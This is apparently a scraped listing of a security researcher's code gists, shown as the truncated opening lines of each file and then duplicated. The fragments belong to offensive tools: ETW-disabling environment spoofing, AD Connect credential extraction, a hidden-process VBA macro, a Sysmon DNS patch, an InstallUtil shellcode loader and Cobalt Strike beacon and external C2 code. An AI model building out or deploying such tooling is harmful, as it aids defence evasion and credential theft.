xpn xpn

## env_var_spoofing_poc.cpp
// A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on
// setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET.
//
// Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables,
// and then resuming the process.
//
// (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/)

#define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0"
#define INJECT_PARAM_LEN 43

## azuread_decrypt_msol_v2.ps1
Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
Write-Host "`t[ Updated to support new cryptokey storage method ]`n"

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"

try {
    $client.Open()
} catch {
    Write-Host "[!] Could not connect to localdb..."
    return

## PCMPBNMBAO_x86_poc.vba
' POC to spawn process with PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON mitigation enabled
' by @_xpn_
'
' Thanks to https://github.com/itm4n/VBA-RunPE and https://github.com/christophetd/spoofing-office-macro

Const EXTENDED_STARTUPINFO_PRESENT = &H80000
Const HEAP_ZERO_MEMORY = &H8&
Const SW_HIDE = &H0&
Const MAX_PATH = 260
Const PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = &H20007

## tasks.cs
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;

using System.Reflection;
using System.Reflection.Emit;

using System.Collections;
using System.Collections.Generic;

## dns_sysmon_patch.c
#include <iostream>
#include <Windows.h>
#include <WinDNS.h>

// Pattern for hunting dnsapi!McTemplateU0zqxqz
#define PATTERN (unsigned char*)"\x48\x89\x5c\x24\x08\x44\x89\x4c\x24\x20\x55\x48\x8d\x6c"
#define PATTERN_LEN 14

// Search for pattern in memory
DWORD SearchPattern(unsigned char* mem, unsigned char* signature, DWORD signatureLen) {

## InstallUtil-Shellcode-cs
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;

/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause

## clr_via_native.c
#include "stdafx.h"

int main()
{
	ICLRMetaHost *metaHost = NULL;
	IEnumUnknown *runtime = NULL;
	ICLRRuntimeInfo *runtimeInfo = NULL;
	ICLRRuntimeHost *runtimeHost = NULL;
	IUnknown *enumRuntime = NULL;
	LPWSTR frameworkName = NULL;

## external_client_filetransfer.cpp
#include "stdafx.h"

// Allocates a RWX page for the CS beacon, copies the payload, and starts a new thread
void spawnBeacon(char *payload, DWORD len) {

	HANDLE threadHandle;
	DWORD threadId = 0;
	char *alloc = (char *)VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	memcpy(alloc, payload, len);

## external_client.cpp
#include "stdafx.h"

// Allocates a RWX page for the CS beacon, copies the payload, and starts a new thread
void spawnBeacon(char *payload, DWORD len) {

	HANDLE threadHandle;
	DWORD threadId = 0;
	char *alloc = (char *)VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	memcpy(alloc, payload, len);

## external_controller.py
import socket
import struct
import time

class ExternalC2Controller:
    def __init__(self, port):
        self.port = port

    def encodeFrame(self, data):
        return struct.pack("<I", len(data)) + data
	// A very rough x64 POC for spoofing environment variables similar to argument spoofing with a focus on
	// setting the COMPlus_ETWEnabled=0 var for disabling ETW in .NET.
	//
	// Works by launching the target process suspended, reading PEB, updates the ptr used to store environment variables,
	// and then resuming the process.
	//
	// (https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/)

	#define INJECT_PARAM L"COMPlus_ETWEnabled=0\0\0\0"
	#define INJECT_PARAM_LEN 43
	Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)"
	Write-Host "`t[ Updated to support new cryptokey storage method ]`n"

	$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"

	try {
	$client.Open()
	} catch {
	Write-Host "[!] Could not connect to localdb..."
	return
	' POC to spawn process with PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON mitigation enabled
	' by @_xpn_
	'
	' Thanks to https://github.com/itm4n/VBA-RunPE and https://github.com/christophetd/spoofing-office-macro

	Const EXTENDED_STARTUPINFO_PRESENT = &H80000
	Const HEAP_ZERO_MEMORY = &H8&
	Const SW_HIDE = &H0&
	Const MAX_PATH = 260
	Const PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = &H20007
	using System;
	using System.EnterpriseServices;
	using System.Runtime.InteropServices;

	using System.Reflection;
	using System.Reflection.Emit;

	using System.Collections;
	using System.Collections.Generic;
	#include <iostream>
	#include <Windows.h>
	#include <WinDNS.h>

	// Pattern for hunting dnsapi!McTemplateU0zqxqz
	#define PATTERN (unsigned char*)"\x48\x89\x5c\x24\x08\x44\x89\x4c\x24\x20\x55\x48\x8d\x6c"
	#define PATTERN_LEN 14

	// Search for pattern in memory
	DWORD SearchPattern(unsigned char* mem, unsigned char* signature, DWORD signatureLen) {
	using System;
	using System.Net;
	using System.Diagnostics;
	using System.Reflection;
	using System.Configuration.Install;
	using System.Runtime.InteropServices;

	/*
	Author: Casey Smith, Twitter: @subTee
	License: BSD 3-Clause
	#include "stdafx.h"

	int main()
	{
	ICLRMetaHost *metaHost = NULL;
	IEnumUnknown *runtime = NULL;
	ICLRRuntimeInfo *runtimeInfo = NULL;
	ICLRRuntimeHost *runtimeHost = NULL;
	IUnknown *enumRuntime = NULL;
	LPWSTR frameworkName = NULL;
	#include "stdafx.h"

	// Allocates a RWX page for the CS beacon, copies the payload, and starts a new thread
	void spawnBeacon(char *payload, DWORD len) {

	HANDLE threadHandle;
	DWORD threadId = 0;
	char alloc = (char )VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	memcpy(alloc, payload, len);
	import socket
	import struct
	import time

	class ExternalC2Controller:
	def __init__(self, port):
	self.port = port

	def encodeFrame(self, data):
	return struct.pack("<I", len(data)) + data